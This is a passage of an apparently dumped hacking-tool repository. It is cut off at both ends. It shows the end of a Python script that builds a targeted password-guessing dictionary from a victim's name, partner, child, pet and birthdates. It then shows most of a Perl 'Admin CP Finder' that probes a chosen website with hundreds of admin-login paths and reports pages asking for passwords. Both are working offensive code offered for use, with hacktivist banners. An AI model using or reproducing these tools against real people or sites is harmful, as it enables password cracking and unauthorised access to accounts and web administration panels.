rev_k = [rev_kid, rev_kidup] 160 | 161 | # -------------------------------- 162 | # Let's do some serious work! This will be a mess of code, but... who cares? :) 163 | # -------------------------------- 164 | bds = [birthdate_yy, birthdate_yyy, birthdate_yyyy, birthdate_xd, birthdate_xm, birthdate_dd, birthdate_mm] 165 | 166 | bdss = [] 167 | 168 | for bds1 in bds: 169 | bdss.append(bds1) 170 | for bds2 in bds: 171 | if bds.index(bds1) != bds.index(bds2): 172 | bdss.append(bds1+bds2) 173 | for bds3 in bds: 174 | if bds.index(bds1) != bds.index(bds2) and bds.index(bds2) != bds.index(bds3) and bds.index(bds1) != bds.index(bds3): 175 | bdss.append(bds1+bds2+bds3) 176 | 177 | 178 | 179 | # --------------------------------- 180 | # For a woman 181 | # --------------------------------- 182 | wbds = [wifeb_yy, wifeb_yyy, wifeb_yyyy, wifeb_xd, wifeb_xm, wifeb_dd, wifeb_mm] 183 | 184 | wbdss = [] 185 | 186 | for wbds1 in wbds: 187 | wbdss.append(wbds1) 188 | for wbds2 in wbds: 189 | if wbds.index(wbds1) != wbds.index(wbds2): 190 | wbdss.append(wbds1+wbds2) 191 | for wbds3 in wbds: 192 | if wbds.index(wbds1) != wbds.index(wbds2) and wbds.index(wbds2) != wbds.index(wbds3) and wbds.index(wbds1) != wbds.index(wbds3): 193 | wbdss.append(wbds1+wbds2+wbds3) 194 | 195 | 196 | 197 | # --------------------------------- 198 | # and a child 199 | # --------------------------------- 200 | kbds = [kidb_yy, kidb_yyy, kidb_yyyy, kidb_xd, kidb_xm, kidb_dd, kidb_mm] 201 | 202 | kbdss = [] 203 | 204 | for kbds1 in kbds: 205 | kbdss.append(kbds1) 206 | for kbds2 in kbds: 207 | if kbds.index(kbds1) != kbds.index(kbds2): 208 | kbdss.append(kbds1+kbds2) 209 | for kbds3 in kbds: 210 | if kbds.index(kbds1) != kbds.index(kbds2) and kbds.index(kbds2) != kbds.index(kbds3) and kbds.index(kbds1) != kbds.index(kbds3): 211 | kbdss.append(kbds1+kbds2+kbds3) 212 | 213 | 214 | # --------------------------------- 215 | # string combinations 216 | # --------------------------------- 217 | kombinaac = [pet, petup, company, companyup] 218 | 219 | kombina = [name, surname, nick, nameup, surnameup, nickup] 220 | 221 | kombinaw = [wife, wifen, wifeup, wifenup, surname, surnameup] 222 | 223 | kombinak = [kid, kidn, kidup, kidnup, surname, surnameup] 224 | 225 | kombinaa = [] 226 | for kombina1 in kombina: 227 | kombinaa.append(kombina1) 228 | for kombina2 in kombina: 229 | if kombina.index(kombina1) != kombina.index(kombina2) and kombina.index(kombina1.title()) != kombina.index(kombina2.title()): 230 | kombinaa.append(kombina1+kombina2) 231 | 232 | kombinaaw = [] 233 | for kombina1 in kombinaw: 234 | kombinaaw.append(kombina1) 235 | for kombina2 in kombinaw: 236 | if kombinaw.index(kombina1) != kombinaw.index(kombina2) and kombinaw.index(kombina1.title()) != kombinaw.index(kombina2.title()): 237 | kombinaaw.append(kombina1+kombina2) 238 | 239 | kombinaak = [] 240 | for kombina1 in kombinak: 241 | kombinaak.append(kombina1) 242 | for kombina2 in kombinak: 243 | if kombinak.index(kombina1) != kombinak.index(kombina2) and kombinak.index(kombina1.title()) != kombinak.index(kombina2.title()): 244 | kombinaak.append(kombina1+kombina2) 245 | 246 | 247 | 248 | # inserting some years, you can add more if you want... 249 | years = ['2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010'] 250 | # and some random numbers to make a pwnsauce.., :) 251 | def concats(seq, start, stop): 252 | for mystr in seq: 253 | for num in xrange(start, stop): 254 | yield mystr + str(num) 255 | 256 | 257 | 258 | 259 | # ----------------------------------- 260 | # now sorting and making combinations 261 | # ----------------------------------- 262 | def komb(seq, start): 263 | for mystr in seq: 264 | for mystr1 in start: 265 | yield mystr + mystr1 266 | 267 | komb1 = list(komb(kombinaa, bdss)) 268 | komb2 = list(komb(kombinaaw, wbdss)) 269 | komb3 = list(komb(kombinaak, kbdss)) 270 | komb4 = list(komb(kombinaa, years)) 271 | komb5 = list(komb(kombinaac, years)) 272 | komb6 = list(komb(kombinaaw, years)) 273 | komb7 = list(komb(kombinaak, years)) 274 | komb8 = list(komb(word, bdss)) 275 | komb9 = list(komb(word, wbdss)) 276 | komb10 = list(komb(word, kbdss)) 277 | komb11 = list(komb(word, years)) 278 | # adding random numbers from 0 to 1000, you can change this... 279 | komb12 = list(concats(word, 0, 1000)) 280 | komb13 = list(concats(kombinaa, 0, 1000)) 281 | komb14 = list(concats(kombinaac, 0, 1000)) 282 | komb15 = list(concats(kombinaaw, 0, 1000)) 283 | komb16 = list(concats(kombinaak, 0, 1000)) 284 | komb17 = list(komb(reverse, years)) 285 | komb18 = list(komb(rev_w, years)) 286 | komb19 = list(komb(rev_k, kbdss)) 287 | komb20 = list(komb(rev_n, bdss)) 288 | komb21 = list(concats(reverse, 0, 1000)) 289 | 290 | print BUS+"[*]"+WHITE+" Sorting list and removing duplicates..." 291 | 292 | komb_unique1 = dict.fromkeys(komb1).keys() 293 | komb_unique2 = dict.fromkeys(komb2).keys() 294 | komb_unique3 = dict.fromkeys(komb3).keys() 295 | komb_unique4 = dict.fromkeys(komb4).keys() 296 | komb_unique5 = dict.fromkeys(komb5).keys() 297 | komb_unique6 = dict.fromkeys(komb6).keys() 298 | komb_unique7 = dict.fromkeys(komb7).keys() 299 | komb_unique8 = dict.fromkeys(komb8).keys() 300 | komb_unique9 = dict.fromkeys(komb9).keys() 301 | komb_unique10 = dict.fromkeys(komb10).keys() 302 | komb_unique11 = dict.fromkeys(komb11).keys() 303 | komb_unique12 = dict.fromkeys(komb12).keys() 304 | komb_unique13 = dict.fromkeys(komb13).keys() 305 | komb_unique14 = dict.fromkeys(komb14).keys() 306 | komb_unique15 = dict.fromkeys(komb15).keys() 307 | komb_unique16 = dict.fromkeys(komb16).keys() 308 | komb_unique17 = dict.fromkeys(komb17).keys() 309 | komb_unique18 = dict.fromkeys(komb18).keys() 310 | komb_unique19 = dict.fromkeys(komb19).keys() 311 | komb_unique20 = dict.fromkeys(komb20).keys() 312 | komb_unique21 = dict.fromkeys(komb21).keys() 313 | komb_unique01 = dict.fromkeys(kombinaa).keys() 314 | komb_unique02 = dict.fromkeys(kombinaac).keys() 315 | komb_unique03 = dict.fromkeys(kombinaaw).keys() 316 | komb_unique04 = dict.fromkeys(kombinaak).keys() 317 | komb_unique05 = dict.fromkeys(word).keys() 318 | 319 | uniqlist = bdss+wbdss+kbdss+reverse+komb_unique01+komb_unique02+komb_unique03+komb_unique04+komb_unique05+komb_unique1+komb_unique2+komb_unique3+komb_unique4+komb_unique5+komb_unique6+komb_unique7+komb_unique8+komb_unique9+komb_unique10+komb_unique11+komb_unique12+komb_unique13+komb_unique14+komb_unique15+komb_unique16+komb_unique17+komb_unique18+komb_unique19+komb_unique20+komb_unique21 320 | 321 | unique_list = dict.fromkeys(uniqlist).keys() 322 | 323 | 324 | f = open ( name+'.txt', 'w' ) 325 | f.write (os.linesep.join(unique_list)) 326 | f.close() 327 | 328 | lines = 0 329 | fcount = open ( name+'.txt', 'r' ) 330 | for line in fcount: 331 | lines += 1 332 | 333 | fcount.close() 334 | 335 | print BUS+"[*]"+WHITE+" Saving dictionary to "+GREEN+"[DHH/"+name+".txt]"+WHITE+", counting "+GREEN+"["+str(lines)+"]"+WHITE+" words." 336 | print BUS+"[*]"+WHITE+" Now load your pistolero with "+GREEN+"["+name+".txt]"+WHITE+" and shoot! Good luck!" 337 | print WHITE+"" 338 | print WHITE+"" 339 | 340 | # --------------------------- 341 | # end of file 342 | # --------------------------- 343 | -------------------------------------------------------------------------------- /fap.pl: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/perl 3 | 4 | use HTTP::Request; 5 | use LWP::UserAgent; 6 | system('exit'); 7 | system('cls'); 8 | system('title Admin CP Finder '); 9 | system "color 0a"; 10 | print"\n"; 11 | print "\t>#------------------------------------------------------------------------------------------------#\n"; 12 | print "\t># #\n"; 13 | print "\t># FIND CONTROL PANEL OF WEBSITE #\n"; 14 | print "\t># #\n"; 15 | print "\t># .oOo o o #\n"; 16 | print "\t># O o O O o #\n"; 17 | print "\t># o o o #\n"; 18 | print "\t># OoO o o #\n"; 19 | print "\t># o O 'OoOo. .oOoO .oOoO' .oOoO `oOOoOO. O 'OoOo. .oOo. .oOoO' .oOoO .oOo. #\n"; 20 | print "\t># O o o O o O O o o O O o o o o O O o O o o O OooO' #\n"; 21 | print "\t># o O O o O o o O O o o O O O O o o O o O O o O #\n"; 22 | print "\t># O' o' o O `OoO'o `OoO'o `OoO'o O o o o' o O oOoO' `OoO'o `OoOo `OoO' #\n"; 23 | print "\t># O O #\n"; 24 | print "\t>#----------------------------------------------- _______________________________ #\n"; 25 | print "\t># This tool searches for a site control page # | {We Are Anonymous Arabs} :) } #\n"; 26 | print "\t># the best tool for this job :) # | {We Are Legion} } #\n"; 27 | print "\t># {by<---Oseid Aldary--->} (JOKER11) # | {We Are Don't Forgive} } #\n"; 28 | print "\t># Find|Admin|Page|V1.0| # | {we Are Don't Forget} } #\n"; 29 | print "\t># # | {expect us} } #\n"; 30 | print "\t>#------------------------------------------------------------------------------------------------#\n"; 31 | print "\t># For Help Please Visit My Account{https://www.facebook.com/profile.php?id=100017170449859} #\n"; 32 | print "\t>#------------------------------------------------------------------------------------------------#\n"; 33 | print "\n"; 34 | 35 | print " Enter target Site\n Example: www.google.com or www.google.com/path\nEnter Taget site : "; 36 | $site=; 37 | chomp $site; 38 | 39 | print "\n"; 40 | print " #-------------------------#\n\n 1 > php\n 2 > asp\n 3 > aspx\n 4 > cfm\n 5 > js\n 6 > cgi\n 7 > brf\n\nEnter site source code :> "; 41 | $code=; 42 | chomp($code); 43 | 44 | if ( $site !~ /^http:/ ) { 45 | $site = 'http://' . $site; 46 | } 47 | if ( $site !~ /\/$/ ) { 48 | $site = $site . '/'; 49 | } 50 | print "\n"; 51 | 52 | print "-> Target: $site\n"; 53 | print "-> Site source code: $code\n\n"; 54 | print "-> start finding the page for you :) ...\n\n\n"; 55 | 56 | if($code eq "2"){ 57 | 58 | @path1=('adm/','admmi/','admins','adminn','admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 59 | 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 60 | 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 61 | 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 62 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 63 | 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 64 | 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 65 | 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 66 | 'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 67 | 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 68 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 69 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 70 | 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 71 | 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 72 | 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 73 | 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 74 | 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 75 | 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 76 | 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' 77 | ); 78 | 79 | foreach $ways(@path1){ 80 | 81 | $final=$site.$ways; 82 | 83 | my $req=HTTP::Request->new(GET=>$final); 84 | my $ua=LWP::UserAgent->new(); 85 | $ua->timeout(30); 86 | my $response=$ua->request($req); 87 | 88 | if($response->content =~ /Username/ || 89 | $response->content =~ /Password/ || 90 | $response->content =~ /username/ || 91 | $response->content =~ /password/ || 92 | $response->content =~ /USERNAME/ || 93 | $response->content =~ /PASSWORD/ || 94 | $response->content =~ /Username/ || 95 | $response->content =~ /Wachtwoord/ || 96 | $response->content =~ /Senha/ || 97 | $response->content =~ /senha/ || 98 | $response->content =~ /Personal/ || 99 | $response->content =~ /Usuario/ || 100 | $response->content =~ /Clave/ || 101 | $response->content =~ /Usager/ || 102 | $response->content =~ /usager/ || 103 | $response->content =~ /Sing/ || 104 | $response->content =~ /passe/ || 105 | $response->content =~ /P\/W/ || 106 | $response->content =~ /Admin Password/ 107 | ){ 108 | print " \n [+√]Found page[√] -> $final\n\n\n"; 109 | }else{ 110 | print "[-x]{Not Found :( <- $final\n"; 111 | } 112 | } 113 | } 114 | 115 | if($code eq "1"){ 116 | 117 | @path2=('adm/','admmi/','admins/','adminn/','add/','admiin/','usr/','usrlog/','usrname/','loginpass/','adminCP/','admincp/','adminpc/','adminPC/','adminlog/','usernames/','usrlogin/','adcp/','adim/','a/','uscp/','usad/','admr/','amd/','joker/','world/','life/','adminman/','adminusr/','admind/','adminsterator/','adminjack/','adminahmad/','adminmohmmad/','adminmark/','adminali/','admintarq/','adminoseid/','adminhhack/','admonsecurity/','adminsecu',' 118 | adm/','admmi/','admins','adminn','admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 119 | 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 120 | 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 121 | 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 122 | 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 123 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 124 | 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 125 | 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 126 | 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 127 | 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 128 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 129 | 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 130 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 131 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 132 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 133 | 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 134 | 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 135 | 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php', 136 | 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' 137 | ); 138 | 139 | foreach $ways(@path2){ 140 | 141 | $final=$site.$ways; 142 | 143 | my $req=HTTP::Request->new(GET=>$final); 144 | my $ua=LWP::UserAgent->new(); 145 | $ua->timeout(30); 146 | my $response=$ua->request($req); 147 | 148 | if($response->content =~ /Username/ || 149 | $response->content =~ /Password/ || 150 | $response->content =~ /username/ || 151 | $response->content =~ /password/ || 152 | $response->content =~ /USERNAME/ || 153 | $response->content =~ /PASSWORD/ || 154 | $response->content =~ /Username/ || 155 | $response->content =~ /Wachtwoord/ || 156 | $response->content =~ /Senha/ || 157 | $response->content =~ /senha/ || 158 | $response->content =~ /Personal/ || 159 | $response->content =~ /Usuario/ || 160 | $response->content =~ /Clave/ || 161 | $response->content =~ /Usager/ || 162 | $response->content =~ /usager/ || 163 | $response->content =~ /Sing/ || 164 | $response->content =~ /passe/ || 165 | $response->content =~ /P\/W/ || 166 | $response->content =~ /Admin Password/ 167 | ){ 168 | print " \n [+√]Found page[√] -> $final\n\n\n"; 169 | 170 | }else{ 171 | print "[-x] Not Found :( <- $final\n"; 172 | } 173 | } 174 | } 175 | 176 | 177 | if($code eq "4"){ 178 | 179 | @path2=('adm/','admmi/','admins','adminn','admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','admin6/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 180 | 'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm', 181 | 'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 182 | 'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html', 183 | 'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 184 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 185 | 'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm', 186 | 'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm', 187 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm', 188 | 'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm', 189 | 'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html', 190 | 'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html', 191 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 192 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 193 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html', 194 | 'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm', 195 | 'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm', 196 | 'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm', 197 | 'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm' 198 | ); 199 | 200 | foreach $ways(@path2){ 201 | 202 | $final=$site.$ways; 203 | 204 | my $req=HTTP::Request->new(GET=>$final); 205 | my $ua=LWP::UserAgent->new(); 206 | $ua->timeout(30); 207 | my $response=$ua->request($req); 208 | 209 | if($response->content =~ /Username/ || 210 | $response->content =~ /Password/ || 211 | $response->content =~ /username/ || 212 | $response->content =~ /password/ || 213 | $response->content =~ /USERNAME/ || 214 | $response->content =~ /PASSWORD/ || 215 | $response->content =~ /Username/ || 216 | $response->content =~ /Wachtwoord/ || 217 | $response->content =~ /Senha/ || 218 | $response->content =~ /senha/ || 219 | $response->content =~ /Personal/ || 220 | $response->content =~ /Usuario/ || 221 | $response->content =~ /Clave/ || 222 | $response->content =~ /Usager/ || 223 | $response->content =~ /usager/ || 224 | $response->content =~ /Sing/ || 225 | $response->content =~ /passe/ || 226 | $response->content =~ /P\/W/ || 227 | $response->content =~ /Admin Password/ 228 | ){ 229 | print " \n [+√]Found page[√] -> $final\n\n\n"; 230 | }else{ 231 | print "[-x] Not Found :( <- $final\n"; 232 | } 233 | } 234 | } 235 | 236 | if($code eq "3"){ 237 | 238 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 239 | 'memberadmin/','administratorlogin/','adm/','admin/account.aspx','admin/index.aspx','admin/login.aspx','admin/admin.aspx','admin/account.aspx', 240 | 'admin_area/admin.aspx','admin_area/login.aspx','siteadmin/login.aspx','siteadmin/index.aspx','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 241 | 'admin_area/index.aspx','bb-admin/index.aspx','bb-admin/login.aspx','bb-admin/admin.aspx','admin/home.aspx','admin_area/login.html','admin_area/index.html', 242 | 'admin/controlpanel.aspx','admin.aspx','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 243 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 244 | 'admin/cp.aspx','cp.aspx','administrator/index.aspx','administrator/login.aspx','nsw/admin/login.aspx','webadmin/login.aspx','admin/admin_login.aspx','admin_login.aspx', 245 | 'administrator/account.aspx','administrator.aspx','admin_area/admin.html','pages/admin/admin-login.aspx','admin/admin-login.aspx','admin-login.aspx', 246 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.aspx','modelsearch/login.aspx','moderator.aspx','moderator/login.aspx', 247 | 'moderator/admin.aspx','acceso.aspx','account.aspx','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.aspx','admincontrol.aspx', 248 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.aspx','adminarea/index.html','adminarea/admin.html', 249 | 'webadmin.aspx','webadmin/index.aspx','webadmin/admin.aspx','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.aspx','moderator.html', 250 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 251 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 252 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.aspx','account.html','controlpanel.html','admincontrol.html', 253 | 'panel-administracion/login.aspx','wp-login.aspx','adminLogin.aspx','admin/adminLogin.aspx','home.aspx','admin.aspx','adminarea/index.aspx', 254 | 'adminarea/admin.aspx','adminarea/login.aspx','panel-administracion/index.aspx','panel-administracion/admin.aspx','modelsearch/index.aspx', 255 | 'modelsearch/admin.aspx','admincontrol/login.aspx','adm/admloginuser.aspx','admloginuser.aspx','admin2.aspx','admin2/login.aspx','admin2/index.aspx','usuarios/login.aspx', 256 | 'adm/index.aspx','adm.aspx','affiliate.aspx','adm_auth.aspx','memberadmin.aspx','administratorlogin.aspx' 257 | ); 258 | 259 | foreach $ways(@path2){ 260 | 261 | $final=$site.$ways; 262 | 263 | my $req=HTTP::Request->new(GET=>$final); 264 | my $ua=LWP::UserAgent->new(); 265 | $ua->timeout(30); 266 | my $response=$ua->request($req); 267 | 268 | if($response->content =~ /Username/ || 269 | $response->content =~ /Password/ || 270 | $response->content =~ /username/ || 271 | $response->content =~ /password/ || 272 | $response->content =~ /USERNAME/ || 273 | $response->content =~ /PASSWORD/ || 274 | $response->content =~ /Username/ || 275 | $response->content =~ /Wachtwoord/ || 276 | $response->content =~ /Senha/ || 277 | $response->content =~ /senha/ || 278 | $response->content =~ /Personal/ || 279 | $response->content =~ /Usuario/ || 280 | $response->content =~ /Clave/ || 281 | $response->content =~ /Usager/ || 282 | $response->content =~ /usager/ || 283 | $response->content =~ /Sing/ || 284 | $response->content =~ /passe/ || 285 | $response->content =~ /P\/W/ || 286 | $response->content =~ /Admin Password/ 287 | ){ 288 | print " \n [+√]Found page[√] -> $final\n\n\n"; 289 | }else{ 290 | print "[-x] Not Found :( <- $final\n"; 291 | } 292 | } 293 | } 294 | 295 | 296 | if($code eq "5"){ 297 | 298 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 299 | 'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js', 300 | 'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 301 | 'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html', 302 | 'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 303 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 304 | 'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js', 305 | 'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js', 306 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js', 307 | 'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js', 308 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html', 309 | 'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html', 310 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 311 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 312 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html', 313 | 'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js', 314 | 'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js', 315 | 'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js', 316 | 'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js' 317 | ); 318 | 319 | foreach $ways(@path2){ 320 | 321 | $final=$site.$ways; 322 | 323 | my $req=HTTP::Request->new(GET=>$final); 324 | my $ua=LWP::UserAgent->new(); 325 | $ua->timeout(30); 326 | my $response=$ua->request($req); 327 | 328 | if($response->content =~ /Username/ || 329 | $response->content =~ /Password/ || 330 | $response->content =~ /username/ || 331 | $response->content =~ /password/ || 332 | $response->content =~ /USERNAME/ || 333 | $response->content =~ /PASSWORD/ || 334 | $response->content =~ /Username/ || 335 | $response->content =~ /Wachtwoord/ || 336 | $response->content =~ /Senha/ || 337 | $response->content =~ /senha/ || 338 | $response->content =~ /Personal/ || 339 | $response->content =~ /Usuario/ || 340 | $response->content =~ /Clave/ || 341 | $response->content =~ /Usager/ || 342 | $response->content =~ /usager/ || 343 | $response->content =~ /Sing/ || 344 | $response->content =~ /passe/ || 345 | $response->content =~ /P\/W/ || 346 | $response->content 